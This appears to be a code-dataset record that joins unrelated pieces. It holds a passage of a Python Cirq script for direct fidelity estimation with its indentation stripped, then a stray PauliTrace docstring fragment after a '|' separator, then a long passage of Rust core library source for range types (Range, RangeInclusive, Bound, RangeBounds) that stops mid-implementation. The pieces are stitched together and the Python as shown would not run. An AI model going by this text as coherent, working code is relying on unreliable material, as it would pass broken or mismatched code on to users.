on an actual computer, which is expensive. This way, runs can be more easily
debugged offline.
"""
# If the circuit is Clifford, the Clifford state from which we can extract
# a list of Pauli strings for a basis of the stabilizers.
clifford_state: Optional[cirq.CliffordState]
# The list of Pauli traces we can sample from.
pauli_traces: List[PauliTrace]
# Measurement results from sampling the circuit.
trial_results: List[TrialResult]
def direct_fidelity_estimation(circuit: cirq.Circuit, qubits: List[cirq.Qid],
sampler: cirq.Sampler,
n_measured_operators: Optional[int],
samples_per_term: int):
"""
Implementation of direct fidelity estimation, as per 'Direct Fidelity
Estimation from Few Pauli Measurements' https://arxiv.org/abs/1104.4695 and
'Practical characterization of quantum devices without tomography'
https://arxiv.org/abs/1104.3835.
Args:
circuit: The circuit to run the simulation on.
qubits: The list of qubits.
sampler: Either a noisy simulator or an engine.
n_measured_operators: The total number of Pauli measurements, or None to
explore each Pauli state once.
samples_per_term: if set to 0, we use the 'sampler' parameter above as
a noise (must be of type cirq.DensityMatrixSimulator) and
simulate noise in the circuit. If greater than 0, we instead use the
'sampler' parameter directly to estimate the characteristic
function.
Returns:
The estimated fidelity and a log of the run.
"""
# n_measured_operators is upper-case N in https://arxiv.org/abs/1104.3835
# Number of qubits, lower-case n in https://arxiv.org/abs/1104.3835
n_qubits = len(qubits)
clifford_circuit = True
clifford_state: Optional[cirq.CliffordState] = None
try:
clifford_state = cirq.CliffordState(
qubit_map={qubits[i]: i for i in range(len(qubits))})
for gate in circuit.all_operations():
clifford_state.apply_unitary(gate)
except ValueError:
clifford_circuit = False
# Computes for every \hat{P_i} of https://arxiv.org/abs/1104.3835
# estimate rho_i and Pr(i). We then collect tuples (rho_i, Pr(i), \hat{Pi})
# inside the variable 'pauli_traces'.
if clifford_circuit:
assert clifford_state is not None
pauli_traces = _estimate_pauli_traces_clifford(
n_qubits, cast(cirq.CliffordState, clifford_state),
n_measured_operators)
else:
pauli_traces = _estimate_pauli_traces_general(qubits, circuit,
n_measured_operators)
p = np.asarray([x.Pr_i for x in pauli_traces])
if n_measured_operators is None:
# Since we enumerate all the possible traces, the probs should add to 1.
assert np.isclose(np.sum(p), 1.0, atol=1e-6)
p /= np.sum(p)
fidelity = 0.0
if samples_per_term == 0:
# sigma in https://arxiv.org/abs/1104.3835
if not isinstance(sampler, cirq.DensityMatrixSimulator):
raise TypeError('sampler is not a cirq.DensityMatrixSimulator '
'but samples_per_term is zero.')
noisy_simulator = cast(cirq.DensityMatrixSimulator, sampler)
noisy_density_matrix = cast(
cirq.DensityMatrixTrialResult,
noisy_simulator.simulate(circuit)).final_density_matrix
if clifford_circuit and n_measured_operators is None:
# In case the circuit is Clifford and we compute an exhaustive list of
# Pauli traces, instead of sampling we can simply enumerate them because
# they all have the same probability.
measured_pauli_traces = pauli_traces
else:
# Otherwise, randomly sample as per probability.
measured_pauli_traces = np.random.choice(pauli_traces,
size=len(pauli_traces),
p=p)
trial_results: List[TrialResult] = []
for pauli_trace in measured_pauli_traces:
measure_pauli_string: cirq.PauliString = pauli_trace.P_i
rho_i = pauli_trace.rho_i
if samples_per_term > 0:
sigma_i = asyncio.get_event_loop().run_until_complete(
estimate_characteristic_function(circuit, measure_pauli_string,
qubits, sampler,
samples_per_term))
else:
sigma_i, _ = compute_characteristic_function(
circuit, measure_pauli_string, qubits, noisy_density_matrix)
trial_results.append(
TrialResult(pauli_trace=pauli_trace, sigma_i=sigma_i))
fidelity += sigma_i / rho_i
estimated_fidelity = fidelity / len(pauli_traces)
dfe_intermediate_result = DFEIntermediateResult(
clifford_state=clifford_state,
pauli_traces=pauli_traces,
trial_results=trial_results)
return estimated_fidelity, dfe_intermediate_result
def parse_arguments(args):
"""Helper function that parses the given arguments."""
parser = argparse.ArgumentParser('Direct fidelity estimation.')
# TODO: Offer some guidance on how to set this flag. Maybe have an
# option to do an exhaustive sample and do numerical studies to know which
# choice is the best.
# Github issue: https://github.com/quantumlib/Cirq/issues/2802
parser.add_argument('--n_measured_operators',
default=10,
type=int,
help='Numbers of measured operators (Pauli strings). '
'If the circuit is Clifford, these operators are '
'computed by sampling for the basis of stabilizers. If '
'the circuit is not Clifford, this is a random sample '
'all the possible operators. If the value of this '
'parameter is None, we enumerate all the operators '
'which is 2**n_qubit for Clifford circuits and '
'4**n_qubits otherwise.')
parser.add_argument('--samples_per_term',
default=0,
type=int,
help='Number of samples per trial or 0 if no sampling.')
return vars(parser.parse_args(args))
def main(*, n_measured_operators: Optional[int], samples_per_term: int):
circuit, qubits = build_circuit()
noise = cirq.ConstantQubitNoiseModel(cirq.depolarize(0.1))
print('Noise model: %s' % (noise))
noisy_simulator = cirq.DensityMatrixSimulator(noise=noise)
estimated_fidelity, _ = direct_fidelity_estimation(
circuit,
qubits,
noisy_simulator,
n_measured_operators=n_measured_operators,
samples_per_term=samples_per_term)
print('Estimated fidelity: %f' % (estimated_fidelity))
if __name__ == '__main__':
main(**parse_arguments(sys.argv[1:]))
| """
A class that contains the Pauli states as described on page 2 of:
https://arxiv.org/abs/1104.3835
"""
# Pauli string.
P_i: cirq.PauliString
# Coefficient of the ideal pure state expanded in the Pauli basis scaled by
# sqrt(dim H), formally defined at bottom of left column of page 2.
rho_i: float
# A probablity (between 0.0 and 1.0) that is the relevance distribution,
# formally defined at top of right column of page 2.
Pr_i: float |
range.rs | // Copyright 2012 The Rust Project Developers. See the COPYRIGHT
// file at the top-level directory of this distribution and at
// http://rust-lang.org/COPYRIGHT.
//
// Licensed under the Apache License, Version 2.0 <LICENSE-APACHE or
// http://www.apache.org/licenses/LICENSE-2.0> or the MIT license
// <LICENSE-MIT or http://opensource.org/licenses/MIT>, at your
// option. This file may not be copied, modified, or distributed
// except according to those terms.
use fmt;
use hash::{Hash, Hasher};
/// An unbounded range (`..`).
///
/// `RangeFull` is primarily used as a [slicing index], its shorthand is `..`.
/// It cannot serve as an [`Iterator`] because it doesn't have a starting point.
///
/// # Examples
///
/// The `..` syntax is a `RangeFull`:
///
/// ```
/// assert_eq!((..), std::ops::RangeFull);
/// ```
///
/// It does not have an [`IntoIterator`] implementation, so you can't use it in
/// a `for` loop directly. This won't compile:
///
/// ```compile_fail,E0277
/// for i in .. {
/// // ...
/// }
/// ```
///
/// Used as a [slicing index], `RangeFull` produces the full array as a slice.
///
/// ```
/// let arr = [0, 1, 2, 3];
/// assert_eq!(arr[ .. ], [0,1,2,3]); // RangeFull
/// assert_eq!(arr[ ..3], [0,1,2 ]);
/// assert_eq!(arr[1.. ], [ 1,2,3]);
/// assert_eq!(arr[1..3], [ 1,2 ]);
/// ```
///
/// [`IntoIterator`]: ../iter/trait.Iterator.html
/// [`Iterator`]: ../iter/trait.IntoIterator.html
/// [slicing index]: ../slice/trait.SliceIndex.html
#[doc(alias = "..")]
#[derive(Copy, Clone, PartialEq, Eq, Hash)]
#[stable(feature = "rust1", since = "1.0.0")]
pub struct RangeFull;
#[stable(feature = "rust1", since = "1.0.0")]
impl fmt::Debug for RangeFull {
fn fmt(&self, fmt: &mut fmt::Formatter) -> fmt::Result {
write!(fmt, "..")
}
}
/// A (half-open) range bounded inclusively below and exclusively above
/// (`start..end`).
///
/// The `Range` `start..end` contains all values with `x >= start` and
/// `x < end`. It is empty unless `start < end`.
///
/// # Examples
///
/// ```
/// assert_eq!((3..5), std::ops::Range { start: 3, end: 5 });
/// assert_eq!(3 + 4 + 5, (3..6).sum());
///
/// let arr = ['a', 'b', 'c', 'd'];
/// assert_eq!(arr[ .. ], ['a', 'b', 'c', 'd']);
/// assert_eq!(arr[ ..3], ['a', 'b', 'c', ]);
/// assert_eq!(arr[1.. ], [ 'b', 'c', 'd']);
/// assert_eq!(arr[1..3], [ 'b', 'c' ]); // Range
/// ```
#[doc(alias = "..")]
#[derive(Clone, PartialEq, Eq, Hash)] // not Copy -- see #27186
#[stable(feature = "rust1", since = "1.0.0")]
pub struct Range<Idx> {
/// The lower bound of the range (inclusive).
#[stable(feature = "rust1", since = "1.0.0")]
pub start: Idx,
/// The upper bound of the range (exclusive).
#[stable(feature = "rust1", since = "1.0.0")]
pub end: Idx,
}
#[stable(feature = "rust1", since = "1.0.0")]
impl<Idx: fmt::Debug> fmt::Debug for Range<Idx> {
fn fmt(&self, fmt: &mut fmt::Formatter) -> fmt::Result {
write!(fmt, "{:?}..{:?}", self.start, self.end)
}
}
impl<Idx: PartialOrd<Idx>> Range<Idx> {
/// Returns `true` if `item` is contained in the range.
///
/// # Examples
///
/// ```
/// #![feature(range_contains)]
///
/// use std::f32;
///
/// assert!(!(3..5).contains(&2));
/// assert!( (3..5).contains(&3));
/// assert!( (3..5).contains(&4));
/// assert!(!(3..5).contains(&5));
///
/// assert!(!(3..3).contains(&3));
/// assert!(!(3..2).contains(&3));
///
/// assert!( (0.0..1.0).contains(&0.5));
/// assert!(!(0.0..1.0).contains(&f32::NAN));
/// assert!(!(0.0..f32::NAN).contains(&0.5));
/// assert!(!(f32::NAN..1.0).contains(&0.5));
/// ```
#[unstable(feature = "range_contains", reason = "recently added as per RFC", issue = "32311")]
pub fn contains<U>(&self, item: &U) -> bool
where
Idx: PartialOrd<U>,
U: ?Sized + PartialOrd<Idx>,
{
<Self as RangeBounds<Idx>>::contains(self, item)
}
/// Returns `true` if the range contains no items.
///
/// # Examples
///
/// ```
/// #![feature(range_is_empty)]
///
/// assert!(!(3..5).is_empty());
/// assert!( (3..3).is_empty());
/// assert!( (3..2).is_empty());
/// ```
///
/// The range is empty if either side is incomparable:
///
/// ```
/// #![feature(range_is_empty)]
///
/// use std::f32::NAN;
/// assert!(!(3.0..5.0).is_empty());
/// assert!( (3.0..NAN).is_empty());
/// assert!( (NAN..5.0).is_empty());
/// ```
#[unstable(feature = "range_is_empty", reason = "recently added", issue = "48111")]
pub fn is_empty(&self) -> bool {
!(self.start < self.end)
}
}
/// A range only bounded inclusively below (`start..`).
///
/// The `RangeFrom` `start..` contains all values with `x >= start`.
///
/// *Note*: Currently, no overflow checking is done for the [`Iterator`]
/// implementation; if you use an integer range and the integer overflows, it
/// might panic in debug mode or create an endless loop in release mode. **This
/// overflow behavior might change in the future.**
///
/// # Examples
///
/// ```
/// assert_eq!((2..), std::ops::RangeFrom { start: 2 });
/// assert_eq!(2 + 3 + 4, (2..).take(3).sum());
///
/// let arr = [0, 1, 2, 3];
/// assert_eq!(arr[ .. ], [0,1,2,3]);
/// assert_eq!(arr[ ..3], [0,1,2 ]);
/// assert_eq!(arr[1.. ], [ 1,2,3]); // RangeFrom
/// assert_eq!(arr[1..3], [ 1,2 ]);
/// ```
///
/// [`Iterator`]: ../iter/trait.IntoIterator.html
#[doc(alias = "..")]
#[derive(Clone, PartialEq, Eq, Hash)] // not Copy -- see #27186
#[stable(feature = "rust1", since = "1.0.0")]
pub struct RangeFrom<Idx> {
/// The lower bound of the range (inclusive).
#[stable(feature = "rust1", since = "1.0.0")]
pub start: Idx,
}
#[stable(feature = "rust1", since = "1.0.0")]
impl<Idx: fmt::Debug> fmt::Debug for RangeFrom<Idx> {
fn fmt(&self, fmt: &mut fmt::Formatter) -> fmt::Result {
write!(fmt, "{:?}..", self.start)
}
}
impl<Idx: PartialOrd<Idx>> RangeFrom<Idx> {
/// Returns `true` if `item` is contained in the range.
///
/// # Examples
///
/// ```
/// #![feature(range_contains)]
///
/// use std::f32;
///
/// assert!(!(3..).contains(&2));
/// assert!( (3..).contains(&3));
/// assert!( (3..).contains(&1_000_000_000));
///
/// assert!( (0.0..).contains(&0.5));
/// assert!(!(0.0..).contains(&f32::NAN));
/// assert!(!(f32::NAN..).contains(&0.5));
/// ```
#[unstable(feature = "range_contains", reason = "recently added as per RFC", issue = "32311")]
pub fn contains<U>(&self, item: &U) -> bool
where
Idx: PartialOrd<U>,
U: ?Sized + PartialOrd<Idx>,
{
<Self as RangeBounds<Idx>>::contains(self, item)
}
}
/// A range only bounded exclusively above (`..end`).
///
/// The `RangeTo` `..end` contains all values with `x < end`.
/// It cannot serve as an [`Iterator`] because it doesn't have a starting point.
///
/// # Examples
///
/// The `..end` syntax is a `RangeTo`:
///
/// ```
/// assert_eq!((..5), std::ops::RangeTo { end: 5 });
/// ```
///
/// It does not have an [`IntoIterator`] implementation, so you can't use it in
/// a `for` loop directly. This won't compile:
///
/// ```compile_fail,E0277
/// // error[E0277]: the trait bound `std::ops::RangeTo<{integer}>:
/// // std::iter::Iterator` is not satisfied
/// for i in ..5 {
/// // ...
/// }
/// ```
///
/// When used as a [slicing index], `RangeTo` produces a slice of all array
/// elements before the index indicated by `end`.
///
/// ```
/// let arr = [0, 1, 2, 3];
/// assert_eq!(arr[ .. ], [0,1,2,3]);
/// assert_eq!(arr[ ..3], [0,1,2 ]); // RangeTo
/// assert_eq!(arr[1.. ], [ 1,2,3]);
/// assert_eq!(arr[1..3], [ 1,2 ]);
/// ```
///
/// [`IntoIterator`]: ../iter/trait.Iterator.html
/// [`Iterator`]: ../iter/trait.IntoIterator.html
/// [slicing index]: ../slice/trait.SliceIndex.html
#[doc(alias = "..")]
#[derive(Copy, Clone, PartialEq, Eq, Hash)]
#[stable(feature = "rust1", since = "1.0.0")]
pub struct RangeTo<Idx> {
/// The upper bound of the range (exclusive).
#[stable(feature = "rust1", since = "1.0.0")]
pub end: Idx,
}
#[stable(feature = "rust1", since = "1.0.0")]
impl<Idx: fmt::Debug> fmt::Debug for RangeTo<Idx> {
fn fmt(&self, fmt: &mut fmt::Formatter) -> fmt::Result {
write!(fmt, "..{:?}", self.end)
}
}
impl<Idx: PartialOrd<Idx>> RangeTo<Idx> {
/// Returns `true` if `item` is contained in the range.
///
/// # Examples
///
/// ```
/// #![feature(range_contains)]
///
/// use std::f32;
///
/// assert!( (..5).contains(&-1_000_000_000));
/// assert!( (..5).contains(&4));
/// assert!(!(..5).contains(&5));
///
/// assert!( (..1.0).contains(&0.5));
/// assert!(!(..1.0).contains(&f32::NAN));
/// assert!(!(..f32::NAN).contains(&0.5));
/// ```
#[unstable(feature = "range_contains", reason = "recently added as per RFC", issue = "32311")]
pub fn contains<U>(&self, item: &U) -> bool
where
Idx: PartialOrd<U>,
U: ?Sized + PartialOrd<Idx>,
{
<Self as RangeBounds<Idx>>::contains(self, item)
}
}
/// An range bounded inclusively below and above (`start..=end`).
///
/// The `RangeInclusive` `start..=end` contains all values with `x >= start`
/// and `x <= end`. It is empty unless `start <= end`.
///
/// This iterator is [fused], but the specific values of `start` and `end` after
/// iteration has finished are **unspecified** other than that [`.is_empty()`]
/// will return `true` once no more values will be produced.
///
/// [fused]: ../iter/trait.FusedIterator.html
/// [`.is_empty()`]: #method.is_empty
///
/// # Examples
///
/// ```
/// assert_eq!((3..=5), std::ops::RangeInclusive::new(3, 5));
/// assert_eq!(3 + 4 + 5, (3..=5).sum());
///
/// let arr = [0, 1, 2, 3];
/// assert_eq!(arr[ ..=2], [0,1,2 ]);
/// assert_eq!(arr[1..=2], [ 1,2 ]); // RangeInclusive
/// ```
#[doc(alias = "..=")]
#[derive(Clone)] // not Copy -- see #27186
#[stable(feature = "inclusive_range", since = "1.26.0")]
pub struct RangeInclusive<Idx> {
pub(crate) start: Idx,
pub(crate) end: Idx,
pub(crate) is_empty: Option<bool>,
// This field is:
// - `None` when next() or next_back() was never called
// - `Some(false)` when `start <= end` assuming no overflow
// - `Some(true)` otherwise
// The field cannot be a simple `bool` because the `..=` constructor can
// accept non-PartialOrd types, also we want the constructor to be const.
}
trait RangeInclusiveEquality: Sized {
fn canonicalized_is_empty(range: &RangeInclusive<Self>) -> bool;
}
impl<T> RangeInclusiveEquality for T {
#[inline]
default fn canonicalized_is_empty(range: &RangeInclusive<Self>) -> bool {
range.is_empty.unwrap_or_default()
}
}
impl<T: PartialOrd> RangeInclusiveEquality for T {
#[inline]
fn canonicalized_is_empty(range: &RangeInclusive<Self>) -> bool {
range.is_empty()
}
}
#[stable(feature = "inclusive_range", since = "1.26.0")]
impl<Idx: PartialEq> PartialEq for RangeInclusive<Idx> {
#[inline]
fn eq(&self, other: &Self) -> bool {
self.start == other.start && self.end == other.end
&& RangeInclusiveEquality::canonicalized_is_empty(self)
== RangeInclusiveEquality::canonicalized_is_empty(other)
}
}
#[stable(feature = "inclusive_range", since = "1.26.0")]
impl<Idx: Eq> Eq for RangeInclusive<Idx> {}
#[stable(feature = "inclusive_range", since = "1.26.0")]
impl<Idx: Hash> Hash for RangeInclusive<Idx> {
fn hash<H: Hasher>(&self, state: &mut H) {
self.start.hash(state);
self.end.hash(state);
RangeInclusiveEquality::canonicalized_is_empty(self).hash(state);
}
}
impl<Idx> RangeInclusive<Idx> {
/// Creates a new inclusive range. Equivalent to writing `start..=end`.
///
/// # Examples
///
/// ```
/// use std::ops::RangeInclusive;
///
/// assert_eq!(3..=5, RangeInclusive::new(3, 5));
/// ```
#[stable(feature = "inclusive_range_methods", since = "1.27.0")]
#[inline]
pub const fn new(start: Idx, end: Idx) -> Self {
Self { start, end, is_empty: None }
}
/// Returns the lower bound of the range (inclusive).
///
/// When using an inclusive range for iteration, the values of `start()` and
/// [`end()`] are unspecified after the iteration ended. To determine
/// whether the inclusive range is empty, use the [`is_empty()`] method
/// instead of comparing `start() > end()`.
///
/// Note: the value returned by this method is unspecified after the range
/// has been iterated to exhaustion.
///
/// [`end()`]: #method.end
/// [`is_empty()`]: #method.is_empty
///
/// # Examples
///
/// ```
/// assert_eq!((3..=5).start(), &3);
/// ```
#[stable(feature = "inclusive_range_methods", since = "1.27.0")]
#[inline]
pub fn start(&self) -> &Idx {
&self.start
}
/// Returns the upper bound of the range (inclusive).
///
/// When using an inclusive range for iteration, the values of [`start()`]
/// and `end()` are unspecified after the iteration ended. To determine
/// whether the inclusive range is empty, use the [`is_empty()`] method
/// instead of comparing `start() > end()`.
///
/// Note: the value returned by this method is unspecified after the range
/// has been iterated to exhaustion.
///
/// [`start()`]: #method.start
/// [`is_empty()`]: #method.is_empty
///
/// # Examples
///
/// ```
/// assert_eq!((3..=5).end(), &5);
/// ```
#[stable(feature = "inclusive_range_methods", since = "1.27.0")]
#[inline]
pub fn end(&self) -> &Idx {
&self.end
}
/// Destructures the `RangeInclusive` into (lower bound, upper (inclusive) bound).
///
/// Note: the value returned by this method is unspecified after the range
/// has been iterated to exhaustion.
///
/// # Examples
///
/// ```
/// assert_eq!((3..=5).into_inner(), (3, 5));
/// ```
#[stable(feature = "inclusive_range_methods", since = "1.27.0")]
#[inline]
pub fn into_inner(self) -> (Idx, Idx) {
(self.start, self.end)
}
}
#[stable(feature = "inclusive_range", since = "1.26.0")]
impl<Idx: fmt::Debug> fmt::Debug for RangeInclusive<Idx> {
fn fmt(&self, fmt: &mut fmt::Formatter) -> fmt::Result {
write!(fmt, "{:?}..={:?}", self.start, self.end)
}
}
impl<Idx: PartialOrd<Idx>> RangeInclusive<Idx> {
/// Returns `true` if `item` is contained in the range.
///
/// # Examples
///
/// ```
/// #![feature(range_contains)]
///
/// use std::f32;
///
/// assert!(!(3..=5).contains(&2));
/// assert!( (3..=5).contains(&3));
/// assert!( (3..=5).contains(&4));
/// assert!( (3..=5).contains(&5));
/// assert!(!(3..=5).contains(&6));
///
/// assert!( (3..=3).contains(&3));
/// assert!(!(3..=2).contains(&3));
///
/// assert!( (0.0..=1.0).contains(&1.0));
/// assert!(!(0.0..=1.0).contains(&f32::NAN));
/// assert!(!(0.0..=f32::NAN).contains(&0.0));
/// assert!(!(f32::NAN..=1.0).contains(&1.0));
/// ```
#[unstable(feature = "range_contains", reason = "recently added as per RFC", issue = "32311")]
pub fn contains<U>(&self, item: &U) -> bool
where
Idx: PartialOrd<U>,
U: ?Sized + PartialOrd<Idx>,
{
<Self as RangeBounds<Idx>>::contains(self, item)
}
/// Returns `true` if the range contains no items.
///
/// # Examples
///
/// ```
/// #![feature(range_is_empty)]
///
/// assert!(!(3..=5).is_empty());
/// assert!(!(3..=3).is_empty());
/// assert!( (3..=2).is_empty());
/// ```
///
/// The range is empty if either side is incomparable:
///
/// ```
/// #![feature(range_is_empty)]
///
/// use std::f32::NAN;
/// assert!(!(3.0..=5.0).is_empty());
/// assert!( (3.0..=NAN).is_empty());
/// assert!( (NAN..=5.0).is_empty());
/// ```
///
/// This method returns `true` after iteration has finished:
///
/// ```
/// #![feature(range_is_empty)]
///
/// let mut r = 3..=5;
/// for _ in r.by_ref() {}
/// // Precise field values are unspecified here
/// assert!(r.is_empty());
/// ```
#[unstable(feature = "range_is_empty", reason = "recently added", issue = "48111")]
#[inline]
pub fn is_empty(&self) -> bool {
self.is_empty.unwrap_or_else(|| !(self.start <= self.end))
}
// If this range's `is_empty` is field is unknown (`None`), update it to be a concrete value.
#[inline]
pub(crate) fn compute_is_empty(&mut self) {
if self.is_empty.is_none() {
self.is_empty = Some(!(self.start <= self.end));
}
}
}
/// A range only bounded inclusively above (`..=end`).
///
/// The `RangeToInclusive` `..=end` contains all values with `x <= end`.
/// It cannot serve as an [`Iterator`] because it doesn't have a starting point.
///
/// # Examples
///
/// The `..=end` syntax is a `RangeToInclusive`:
///
/// ```
/// assert_eq!((..=5), std::ops::RangeToInclusive{ end: 5 });
/// ```
///
/// It does not have an [`IntoIterator`] implementation, so you can't use it in a
/// `for` loop directly. This won't compile:
///
/// ```compile_fail,E0277
/// // error[E0277]: the trait bound `std::ops::RangeToInclusive<{integer}>:
/// // std::iter::Iterator` is not satisfied
/// for i in ..=5 {
/// // ...
/// }
/// ```
///
/// When used as a [slicing index], `RangeToInclusive` produces a slice of all
/// array elements up to and including the index indicated by `end`.
///
/// ```
/// let arr = [0, 1, 2, 3];
/// assert_eq!(arr[ ..=2], [0,1,2 ]); // RangeToInclusive
/// assert_eq!(arr[1..=2], [ 1,2 ]);
/// ```
///
/// [`IntoIterator`]: ../iter/trait.Iterator.html
/// [`Iterator`]: ../iter/trait.IntoIterator.html
/// [slicing index]: ../slice/trait.SliceIndex.html
#[doc(alias = "..=")]
#[derive(Copy, Clone, PartialEq, Eq, Hash)]
#[stable(feature = "inclusive_range", since = "1.26.0")]
pub struct RangeToInclusive<Idx> {
/// The upper bound of the range (inclusive)
#[stable(feature = "inclusive_range", since = "1.26.0")]
pub end: Idx,
}
#[stable(feature = "inclusive_range", since = "1.26.0")]
impl<Idx: fmt::Debug> fmt::Debug for RangeToInclusive<Idx> {
fn fmt(&self, fmt: &mut fmt::Formatter) -> fmt::Result {
write!(fmt, "..={:?}", self.end)
}
}
#[unstable(feature = "range_contains", reason = "recently added as per RFC", issue = "32311")]
impl<Idx: PartialOrd<Idx>> RangeToInclusive<Idx> {
/// Returns `true` if `item` is contained in the range.
///
/// # Examples
///
/// ```
/// #![feature(range_contains)]
///
/// use std::f32;
///
/// assert!( (..=5).contains(&-1_000_000_000));
/// assert!( (..=5).contains(&5));
/// assert!(!(..=5).contains(&6));
///
/// assert!( (..=1.0).contains(&1.0));
/// assert!(!(..=1.0).contains(&f32::NAN));
/// assert!(!(..=f32::NAN).contains(&0.5));
/// ```
#[unstable(feature = "range_contains", reason = "recently added as per RFC", issue = "32311")]
pub fn contains<U>(&self, item: &U) -> bool
where
Idx: PartialOrd<U>,
U: ?Sized + PartialOrd<Idx>,
{
<Self as RangeBounds<Idx>>::contains(self, item)
}
}
// RangeToInclusive<Idx> cannot impl From<RangeTo<Idx>>
// because underflow would be possible with (..0).into()
/// An endpoint of a range of keys.
///
/// # Examples
///
/// `Bound`s are range endpoints:
///
/// ```
/// use std::ops::Bound::*;
/// use std::ops::RangeBounds;
///
/// assert_eq!((..100).start_bound(), Unbounded);
/// assert_eq!((1..12).start_bound(), Included(&1));
/// assert_eq!((1..12).end_bound(), Excluded(&12));
/// ```
///
/// Using a tuple of `Bound`s as an argument to [`BTreeMap::range`].
/// Note that in most cases, it's better to use range syntax (`1..5`) instead.
///
/// ```
/// use std::collections::BTreeMap;
/// use std::ops::Bound::{Excluded, Included, Unbounded};
///
/// let mut map = BTreeMap::new();
/// map.insert(3, "a");
/// map.insert(5, "b");
/// map.insert(8, "c");
///
/// for (key, value) in map.range((Excluded(3), Included(8))) {
/// println!("{}: {}", key, value);
/// }
///
/// assert_eq!(Some((&3, &"a")), map.range((Unbounded, Included(5))).next());
/// ```
///
/// [`BTreeMap::range`]: ../../std/collections/btree_map/struct.BTreeMap.html#method.range
#[stable(feature = "collections_bound", since = "1.17.0")]
#[derive(Clone, Copy, Debug, Hash, PartialEq, Eq)]
pub enum Bound<T> {
/// An inclusive bound.
#[stable(feature = "collections_bound", since = "1.17.0")]
Included(#[stable(feature = "collections_bound", since = "1.17.0")] T),
/// An exclusive bound.
#[stable(feature = "collections_bound", since = "1.17.0")]
Excluded(#[stable(feature = "collections_bound", since = "1.17.0")] T),
/// An infinite endpoint. Indicates that there is no bound in this direction.
#[stable(feature = "collections_bound", since = "1.17.0")]
Unbounded,
}
#[stable(feature = "collections_range", since = "1.28.0")]
/// `RangeBounds` is implemented by Rust's built-in range types, produced
/// by range syntax like `..`, `a..`, `..b` or `c..d`.
pub trait RangeBounds<T: ?Sized> {
/// Start index bound.
///
/// Returns the start value as a `Bound`.
///
/// # Examples
///
/// ```
/// # fn main() {
/// use std::ops::Bound::*;
/// use std::ops::RangeBounds;
///
/// assert_eq!((..10).start_bound(), Unbounded);
/// assert_eq!((3..10).start_bound(), Included(&3));
/// # }
/// ```
#[stable(feature = "collections_range", since = "1.28.0")]
fn start_bound(&self) -> Bound<&T>;
/// End index bound.
///
/// Returns the end value as a `Bound`.
///
/// # Examples
///
/// ```
/// # fn main() {
/// use std::ops::Bound::*;
/// use std::ops::RangeBounds;
///
/// assert_eq!((3..).end_bound(), Unbounded);
/// assert_eq!((3..10).end_bound(), Excluded(&10));
/// # }
/// ```
#[stable(feature = "collections_range", since = "1.28.0")]
fn end_bound(&self) -> Bound<&T>;
/// Returns `true` if `item` is contained in the range.
///
/// # Examples
///
/// ```
/// #![feature(range_contains)]
///
/// use std::f32;
///
/// assert!( (3..5).contains(&4));
/// assert!(!(3..5).contains(&2));
///
/// assert!( (0.0..1.0).contains(&0.5));
/// assert!(!(0.0..1.0).contains(&f32::NAN));
/// assert!(!(0.0..f32::NAN).contains(&0.5));
/// assert!(!(f32::NAN..1.0).contains(&0.5));
#[unstable(feature = "range_contains", reason = "recently added as per RFC", issue = "32311")]
fn contains<U>(&self, item: &U) -> bool
where
T: PartialOrd<U>,
U: ?Sized + PartialOrd<T>,
{
(match self.start_bound() {
Included(ref start) => *start <= item,
Excluded(ref start) => *start < item,
Unbounded => true,
})
&&
(match self.end_bound() {
Included(ref end) => item <= *end,
Excluded(ref end) => item < *end,
Unbounded => true,
})
}
}
use self::Bound::{Excluded, Included, Unbounded};
#[stable(feature = "collections_range", since = "1.28.0")]
impl<T: ?Sized> RangeBounds<T> for RangeFull {
fn start_bound(&self) -> Bound<&T> {
Unbounded
}
fn end_bound(&self) -> Bound<&T> {
Unbounded
}
}
#[stable(feature = "collections_range", since = "1.28.0")]
impl<T> RangeBounds<T> for RangeFrom<T> {
fn start_bound(&self) -> Bound<&T> {
Included(&self.start)
}
fn end_bound(&self) -> Bound<&T> {
Unbounded
}
}
#[stable(feature = "collections_range", since = "1.28.0")]
impl<T> RangeBounds<T> for RangeTo<T> {
fn start_bound(&self) -> Bound<&T> {
Unbounded
}
fn end_bound(&self) -> Bound<&T> {
Excluded(&self.end)
}
}
#[stable(feature = "collections_range", since = "1.28.0")]
impl<T> RangeBounds<T> for Range<T> {
fn start_bound(&self) -> Bound<&T> {
Included(&self.start)
}
fn end_bound(&self) -> Bound<&T> {
Excluded(&self.end)
}
}
#[stable(feature = "collections_range", since = "1.28.0")]
impl<T> RangeBounds<T> for RangeInclusive<T> {
fn start_bound(&self) -> Bound<&T> {
Included(&self.start)
}
fn end_bound(&self) -> Bound<&T> {
Included(&self.end)
}
}
#[stable(feature = "collections_range", since = "1.28.0")]
impl<T> RangeBounds<T> for RangeToInclusive<T> {
fn start_bound(&self) -> Bound<&T> {
Unbounded
}
fn end_bound(&self) -> Bound<&T> {
Included(&self.end)
}
}
#[stable(feature = "collections_range", since = "1.28.0")]
impl<T> RangeBounds<T> for (Bound<T>, Bound<T>) {
fn start_bound(&self) -> Bound<&T> {
match *self {
(Included(ref start), _) => Included(start),
(Excluded(ref start), _) => Excluded(start),
(Unbounded, _) => Unbounded,
}
}
fn end_bound(&self) -> Bound<&T> {
match *self {
(_, Included(ref end)) => Included(end),
(_, Excluded(ref end)) => Excluded(end),
(_, Unbounded) => Unbounded,
}
}
}
#[stable(feature = "collections_range", since = "1.28.0")]
impl<'a, T: ?Sized + 'a> RangeBounds<T> for (Bound<&'a T>, Bound<&'a T>) {
fn start_bound(&self) -> Bound<&T> {
self.0
}
fn end_bound(&self) -> Bound<&T> {
self.1
}
}
#[stable(feature = "collections_range", since = "1.28.0")]
impl<T> RangeBounds<T> for RangeFrom<&T> {
fn start_bound(&self) -> Bound<&T> {
Included(self.start)
}
fn end_bound(&self) -> Bound<&T> {
Unbounded
}
}
#[stable(feature = "collections_range", since = "1.28.0")]
impl<T> RangeBounds<T> for RangeTo<&T> {
fn start_bound(&self) -> Bound<&T> {
Unbounded
}
fn end_bound(&self) -> Bound<&T> {
Excluded(self.end)
}
}
#[stable(feature = "collections_range", since = "1.28.0")]
impl<T> RangeBounds<T> for Range<&T> {
fn start_bound(&self) -> Bound<&T> {
Included(self.start)
}
fn end_bound(&self) -> Bound<&T> {
Excluded(self.end)
}
}
#[stable(feature = "collections_range", since = "1.28.0")]
impl<T> RangeBounds<T> for RangeInclusive<&T> {
fn start_bound(&self) -> Bound<&T> {
Included(self.start)
}
fn end_bound(&self) -> Bound<&T> {
Included(self.end)
}
}
#[stable(feature = "collections_range", since = "1.28.0")]
impl<T> RangeBounds<T> for RangeToInclusive<&T> {
fn start_bound(&self) -> Bound<&T> {
Unbounded
}
